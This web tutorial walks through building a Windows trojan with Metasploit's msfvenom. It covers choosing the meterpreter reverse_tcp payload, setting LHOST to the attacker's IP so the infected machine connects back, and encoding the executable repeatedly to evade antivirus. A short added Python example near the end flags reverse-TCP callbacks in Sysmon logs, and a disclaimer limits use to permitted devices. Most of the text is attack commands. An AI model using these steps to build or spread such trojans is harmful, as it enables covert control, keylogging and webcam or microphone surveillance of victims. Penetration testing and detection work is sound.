In this article, we will be using Metasploit, a program used for penetration testing. Metasploit allows you to design your own exploits, payloads, or other viruses/malicious code that you can run on another person’s computer. These payloads range from installing keyloggers to monitoring the traffic on another person’s computer. If you are using Kali Linux, Metasploit will come pre-installed and ready to use.
How to create a trojan virus
By following these steps, you will be able to create your own executable file containing a payload (the exploit you want to run).
Note: we will be using Msfvenom in this tutorial. If you have not used Metasploit in a while, you may be used to using Msfpayload and Msfencode. Msfvenom is a combination of Msfpayload and Msfencode, and all commands in those tools are available in Msfvenom.
- A computer running Kali Linux
- An open terminal
1. Update and Upgrade Your Kali Linux
You should be periodically updating Kali Linux. If you haven’t upgraded in a while or you just booted it up, now is a good time to update.
Open the terminal by clicking the window at the top and type in:
sudo apt-get update
Next, type in:
sudo apt-get upgrade
This should update your system to the most recent version. Now we can begin.
2. Open exploit software
Open up the terminal and type in
This will show a list of commands available to you in metasploit. To see available payloads, type in
msfvenom -l payloads
This will list all available payloads for you to use. As you can see, there are a lot of them. If you want to see other options, you can type in any of the other options listed on screen. You can see options like formatting, platforms, encoders (which will be discussed later in this article), encryption keys, bad characters, and many others.
When giving the command to list payloads, you might see this error:
If you see this, it means that bundler is either set up incorrectly or hasn’t been updated.
Note: if you did not see this error, you can skip to step 3.
To fix this, change the current directory to /usr/share/metasploit-framework by typing in:
from the root directory. If you make a mistake, you can type in
to go back to the previous directory or type in any directory after cd to go there.
Now that we are in the metasploit-framework directory, type in
gem install bundler
to install bundler, then type in
If bundler is not the correct version, you should get a message telling you which version to install (in this case it was 1.17.3). Type in
gem install bundler:[version number]
and then type in
gem update --system
After all of that, everything should work perfectly.
to go back to the root directory.
msfvenom -l payloads
to see a list of payloads.
We recommend using windows/meterpreter/reverse_tcp. It allows you to keylog, sniff for data, and control the infected computer’s file system, microphone, and webcam. It is one of the most versatile, invasive, and devastating payloads in metasploit.
Now that we have our payload, we can check what options we have. Type:
msfvenom --list-options -p [payload]
to see what we can change about the exploit and where the exploit sends the information.
We see that LHOST is blank; this is the address the payload sends information to from the infected device. In most cases, this will be your IP address.
To find your IP address, type
into the terminal to get this window. Your IP address is after the word “inet.” If you are connected to the internet via Ethernet, use the IP address at eth0; if you are connected wirelessly, use the one at wlan0.
Our IP address is our LHOST parameter.
Now that we have our payload, IP address, and port number, we have all the information that we need. Type in:
msfvenom -p [payload] LHOST=[your ip address] LPORT=[the port number] -f [file type] > [path]
The file type should be exe, and the path should be the file name (make sure the file extension after the name and the file type match). Especially make sure to not press enter before putting the “> [path],” as this will run the exploit on your own device.
If we look in our files using ls, we see that our new file pops up.
Since windows/meterpreter/reverse_tcp is a common payload, many antivirus programs will detect it. However, we can encode the program so that an antivirus can’t catch it. Included with Metasploit is a long list of encoders. Type:
msfvenom -l encoders
to see a list of them.
Once you choose the encoder you want (we recommend x86/shikata_ga_nai), you can encode the payload multiple times when you type in the command to make the file. Encoding the file multiple times helps prevent antivirus programs from catching your virus. Type in:
msfvenom -p [payload] LHOST=[your ip address] LPORT=[the port number] -e [encoder] -i [number of times to encrypt] -f [file type] > [path]
Now we have made a trojan virus that has been encoded and is harder for an antivirus program to recognize. If we type ‘ls’ to look at our files, we see…
Our new trojan is in our files.
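Because a reverse_tcp payload makes the infected device dial out to LHOST on LPORT, the callback shows up in connection telemetry regardless of what a file scanner decides. The following is an added example, not part of the original article, that triages outbound-connection records for that pattern; the field names follow Sysmon Event ID 3, while the sample records, the port allowlist, and the threshold are constructed assumptions.

```python
# Added example: triage outbound-connection records for reverse-TCP callbacks.
# Field names follow Sysmon Event ID 3; every record below is constructed.

TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
COMMON_PORTS = {53, 80, 123, 443}  # assumption: site-specific egress allowlist

SAMPLE_EVENTS = [  # constructed sample data, not taken from a real host
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "Initiated": True,
     "DestinationIp": "203.0.113.10", "DestinationPort": 443,
     "DestinationHostname": "example.org"},
    {"Image": r"C:\Users\alice\Downloads\invoice.exe", "Initiated": True,
     "DestinationIp": "192.0.2.55", "DestinationPort": 9001,
     "DestinationHostname": ""},
    {"Image": r"C:\Windows\System32\svchost.exe", "Initiated": False,
     "DestinationIp": "10.0.0.5", "DestinationPort": 3389,
     "DestinationHostname": ""},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\setup.exe", "Initiated": True,
     "DestinationIp": "198.51.100.7", "DestinationPort": 443,
     "DestinationHostname": ""},
]

def reasons(event):
    """Return the heuristics that one connection record trips."""
    if not event["Initiated"]:  # reverse payloads dial out; ignore inbound
        return []
    hits = []
    if not event["Image"].lower().startswith(TRUSTED_DIRS):
        hits.append("image outside trusted install directories")
    if event["DestinationPort"] not in COMMON_PORTS:
        hits.append("destination port not on egress allowlist")
    if not event["DestinationHostname"]:
        hits.append("raw IP destination, no hostname resolved")
    return hits

def triage(events, threshold=2):
    """Keep records tripping at least `threshold` heuristics, worst first."""
    scored = [(e["Image"], reasons(e)) for e in events]
    flagged = [(image, why) for image, why in scored if len(why) >= threshold]
    return sorted(flagged, key=lambda item: len(item[1]), reverse=True)

if __name__ == "__main__":
    for image, why in triage(SAMPLE_EVENTS):
        print(f"{image}: {'; '.join(why)}")
```

These are triage heuristics for an analyst queue, not verdicts; tune the directories, allowlist, and threshold to the environment being monitored.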
Remember, you can only legally run these trojan viruses on devices that belong to you or devices that you have been granted explicit permission to run them on. All other uses are illegal and are not condoned or endorsed by Kali Linux or wealthyroads.com.